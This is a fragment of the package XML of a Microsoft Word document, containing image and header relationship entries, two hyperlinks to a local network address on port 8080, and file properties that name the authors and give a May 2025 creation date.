      <w:ind w:left="505" w:right="167"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180.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20.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30.jpg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpg"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image170.jpg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.jpg"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image210.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192.168.240.129:8080/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.jpg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpg"/><Relationship Id="rId49"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140.jpg"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.jpg"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.240.129:8080/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpg"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.jpg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpg"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image160.jpg"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image200.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oter" Target="footer3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpg"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.jpg"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image150.jpg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpg"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpg"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19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30</Pages>
  <Words>2306</Words>
  <Characters>14644</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>563</Lines>
  <Paragraphs>345</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>16605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SAJAN SATISH SINGH A/L PARAMJEET SINGH</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>MATHAN A/L SUNDRAM</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-16T18:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-16T18:07:00Z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86b4657e-547b-469f-983b-118ac96197bf</vt:lpwstr>
  </property>
</Properties>
</file>